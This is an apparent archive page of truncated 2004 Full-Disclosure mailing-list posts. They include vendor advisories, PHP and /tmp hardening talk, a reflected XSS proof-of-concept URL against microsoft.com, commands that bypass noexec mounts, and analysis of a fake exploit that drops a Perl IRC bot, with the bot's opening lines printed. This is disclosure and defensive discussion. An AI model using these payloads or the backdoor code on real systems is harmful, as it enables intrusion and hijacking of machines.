Hmmm. Another one:
https://mocl.one.microsoft.com/cwdl/CW_Auth.asp?PartnerAction=pick&strErrorString=alert()
Vulnerability reported to the MS in September.
Published under RFPolicy.
(c)oded by [EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
> Be fair now...
>
> NOTHING is more fucked up than the US election.
Not even Microsoft?
-ouch-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Be fair now...
NOTHING is more fucked up than the US election.
d.k
On Wed, 3 Nov 2004 23:58:46 +, n3td3v <[EMAIL PROTECTED]> wrote:
> This thread is more f**ked up than the U.S election.
>
> Thanks,
>
> n3td3v
>
>
>
> ___
> Full-Disclosure -
===
Ubuntu Security Notice USN-17-1 November 04, 2004
passwd vulnerabilities
CAN-2004-1001
===
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty Warth
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: libxml/libxml2
Advisor
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: iptables
Advisory ID:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: shadow-utils
Advisory
im assusing your talking about php with apache if so use php_admin_value
openbase_dir, i would also use php-exec-dir patch, to block all executables
so they cant jump outside to other dirs with normal binarys.
- Original Message -
From: "J b" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Dave King wrote:
There have been several sites that have announced a new phishing
> attack that's been found in Brazil that rewrites the hosts file so
> that when certain bank urls are entered they get directed to the site
> in the hosts file rather than look it up on their DNS server
Let me kn
On Thu, Nov 04, 2004 at 09:22:24PM +0100, Matthias Geerdsen wrote:
> Severity: Low
> Title: shadow: Unauthorized modification of account information
[...]
> A flaw in the chfn and chsh utilities might allow modification of
> account properties by unauthorized users.
[...]
> A local attacker
> However, when browsing the web, I found an article
> which said that "it requires an expert to lockdown
> php" (Sorry, but I can't quite recall the URL).
>
> While I am not a novice, I am defintely not an
> expert either - expecially on security issues.
>
> So, I'd like to ask the members of th
s you need it (as it's a good idea to
disable anything you don't use).
Here are links to several stories about this new phishing scan.
http://story.news.yahoo.com/news?tmpl=story&cid=74&e=4&u=/cmp/20041104/tc_cmp/51202564
http://story.news.yahoo.com/news?tmpl=story&cid=75&
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Symantec LiveUpdate issues may cause DoS
Classification:
===
Level: [LOW]-med-high-crit
ID: HEXVIEW*2004*11*04*1
URL: http://www.hexview.com/docs/20041104-1.txt
Overview:
=
Symantec LiveUpdate is an application designed to
t's a good idea to
> disable anything you don't use).
>
> Here are links to several stories about this new phishing scan.
>
> http://story.news.yahoo.com/news?tmpl=story&cid=74&e=4&u=/cmp/20041104/tc_cmp/51202564
>
>
> http://story.news.yahoo.com/news?
On Thu, 04 Nov 2004 14:27:30 CST, "Brent J. Nordquist" said:
> $ /lib/ld-linux.so.2 /tmp/anexe
This one is actually nailed down in the Linux 2.6 kernel.
pgpsAyFwSJwyc.pgp
Description: PGP signature
On Thu, 04 Nov 2004 18:09:48 -0200, Rodrigo Barbosa said:
> I'm not sure which standard (FHS ? LSB ?), but these softwares should
> honor the TMPDIR environment. And yes, /tmp is the fallback, in case
> $TMPDIR is not set.
OpenOffice apparently does now, after I filed a bug about it. I've not
ch
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: xorg-x11
Advisory ID:
s you need it (as it's a good idea to
disable anything you don't use).
Here are links to several stories about this new phishing scan.
http://story.news.yahoo.com/news?tmpl=story&cid=74&e=4&u=/cmp/20041104/tc_cmp/51202564
http://story.news.yahoo.com/news?tmpl=story&cid=
On Thu, Nov 04, 2004 at 03:33:38PM -0200, Rodrigo Barbosa wrote:
> Does anyone still have /tmp without noexec ?
>
> /dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)
$ /lib/ld-linux.so.2 /tmp/anexe
(or in this case)
$ perl /tmp/hi
Those are just two off the top of my head; I've read of enough
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200411-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Thu, Nov 04, 2004 at 02:24:53PM -0500, [EMAIL PROTECTED] wrote:
> 2) An amazing amount of stuff assumes that /tmp has 'exec' - at
> least for a while, 'rpmbuild' of a Redhat Perl would die because it
> build into a directory on /tmp, and then tried
[EMAIL PROTECTED] wrote:
> I think you all know, how this enables spammers to use HTTP-requests for
> CSS-files to check the validity of e-mails-addresses: Instead of
> embedding an image with an identification code assigned to the
> receipients e-mail-address in the address or as a parameter to th
Yeh it was posted to neworder, security-forums.com, exploitwatch and a
few other places too.
The IRC server used to control the bots has been taken down now, so it's
no longer much of a threat even for those stupid enough to run it
On Thu, 2004-11-04 at 18:32 +, Jerome ATHIAS wrote:
> It seems
On Thu, 04 Nov 2004 15:33:38 -0200, Rodrigo Barbosa said:
> Does anyone still have /tmp without noexec ?
>
> /dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)
1) A lot of people have a "one partition for everything" configuration,
as that's what their distro did at the time they first install
On Thu, 04 Nov 2004 11:07:47 EST, Michael Riedel said:
> Ok so I was dumb enough to run it. Anyone else catch what commands they
> run/ know of a way to track. I really don't feel like re-compiling gentoo.
Multiple people have posted what Perl code gets executed.
The problem is this:
$_ = `$
Um... Yeah... thats gonna stop him. It takes all of about 2 minutes to
setup a new email address and resend.
Also who said the message was not spoofed?
-KF
raza wrote:
So have we identified the sender of the list and banned him from the
Mailing List.?
Raza
-Original Message-
From: [EMAIL
It seems that it was first posted here:
http://neworder.box.sk/forum.php?did=multSecurity%20and%20Networking&thread=206439
> De: "raza" <[EMAIL PROTECTED]>
> A: "'Vincent Archer'" <[EMAIL PROTECTED]>, "'Ferdinand Klinzer'" <[EMAIL PROTECTED]>
> Objet: RE: [Full-Disclosure] New REmote Wi
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Yo Ron!
On Thu, 4 Nov 2004, Ron DuFresne wrote:
> I'm not sure php is all that safe for public consumption as you sir. A
> quick look at security focus, searching the vuln db for PHP, nothing more
> comes up with this history;
You neglected to incl
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Does anyone still have /tmp without noexec ?
/dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)
On Wed, Nov 03, 2004 at 10:58:54PM -0500, Brendan Dolan-Gavitt wrote:
> Here's a rather tidier version of the perl it drops in /tmp/hi,
> courtesy of Pe
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 584-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
November 4th, 2004
Ok so I was dumb enough to run it. Anyone else catch what commands they
run/ know of a way to track. I really don't feel like re-compiling gentoo.
-mike
Vincent Archer wrote:
On Thu, Nov 04, 2004 at 02:32:33PM +0100, Ferdinand Klinzer wrote:
It´s a simple perl script...
and i don´t think you
So have we identified the sender of the list and banned him from the
Mailing List.?
Raza
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Vincent
Archer
Sent: 04 November 2004 14:31
To: Ferdinand Klinzer
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure]
> The "exploit" is supposed to try to open a cmd tool on 31337 (eleet) on
> a target Windows. It fails; the window system is secure... but meanwhile,
> there's a perl IRC bot running in the background of *your* system.
>From what I saw of the code yesterday a connection to the windows box
was not
Cross Site Scripting In Microsoft.com
*
Introduction
It is possible to inject code that executes arbitrary scripts when a user
clicks on a link
within Microsoft's update site page. A proof of concept can be found below.
Technical Details
-
Dear [EMAIL PROTECTED],
It looks like The Bat! uses libpng 1.0.5 and zlib 1.1.3 and is
vulnerable to very old buffer overflow and double free bugs. At least
it catches exception on http://www.security.nnov.ru/files/libpngbo.png
and thread is silently closed... There is no any v
On Thu, Nov 04, 2004 at 02:32:33PM +0100, Ferdinand Klinzer wrote:
> It´s a simple perl script...
>
> and i don´t think you can call it an remote exploit?
It's more subtle than you think.
The "exploit" is supposed to try to open a cmd tool on 31337 (eleet) on
a target Windows. It fails; the wind
While you're statement is entirely true, I believe what Daniel is
trying to point out is the fact that NAV's script blocking feature
(which is supposed to stop ALL attacks, known or not, if they involve
scripting) isn't working.
If you don't password protect your AV settings, a simple batch file
c
DanB UK wrote:
Anyone compiled and tested this yet ?
Cor blimy! I really hope you are joking.
Have you ever used perl before?
It's an interpreted language!
And this code looks like it connects to an irc server(ir3ip.net) joins
a channel(#0x) then messages the user k.
Might have messed that sligh
Yes thats right
Am 04.11.2004 um 15:31 schrieb Vincent Archer:
to
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Bernhard Kuemel schrieb:
> Hi full-disclosure!
>
> ntpd 1:4.2.0a-11 (as in debian testing/sarge and unstable/sid) segfaults
> when accessing ntp servers on IPv6 hosts. I don't know whether this bug
you forgot to Cc: [EMAIL PROTECTED] who is the maint
Dear Daniel Milisic,
Antiviral protection is signature based. Any new virus can do anything
with antiviral program, and there is no currently protection against it.
It's by design.
--Thursday, November 4, 2004, 4:09:02 AM, you wrote to [EMAIL PROTECTED]:
DM> Hi All,
DM> I have major issues wi
It´s a simple perl script...
and i don´t think you can call it an remote exploit?
greets
Ferdinand aka. Bart
Am 04.11.2004 um 11:40 schrieb DanB UK:
Anyone compiled and tested this yet ?
Cor blimy! I really hope you are joking.
Have you ever used perl before?
It's an interpreted language!
And this
It was much more easier to do:
$ gcc exploit.c
$ strings a.out
/lib/ld-linux.so.2
libc.so.6
memcpy
perror
chmod
fprintf
fseek
strncpy
sscanf
memset
fclose
exit
fopen
atoi
_IO_stdin_used
__libc_start_main
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.ne
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] Behalf Of Tiziano
> Radice
> Sent: 03 November 2004 09:08
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Security (for the common people) in
> electronic vote?
>
>
>
>
> -Messaggio originale-
> Surp
Nice try Ron,
while PHP indeed had lots of advisories in the past, your
list is FUD.
Many of the listed vulnerabilities are within non standard
or even EXPERIMENTAL extensions, are theoretical vulnerabilities,
are only exploitable if precondition a,b,c,d,e,f,g is fullfilled
or are only affecting
[EMAIL PROTECTED] wrote:
How dangerous is this? What about possible CSS-exploits?
Not that, but it works at Outlook Express 6.00.2900.2180
(xpsp_sp2_rtm.040803-2158) too. It loads CSS-Files from an external
server...
Greetings,
Martin Thielecke
___
Ful
> Anyone compiled and tested this yet ?
Cor blimy! I really hope you are joking.
Have you ever used perl before?
It's an interpreted language!
And this code looks like it connects to an irc server(ir3ip.net) joins
a channel(#0x) then messages the user k.
Might have messed that slightly only lo
47 matches
Mail list logo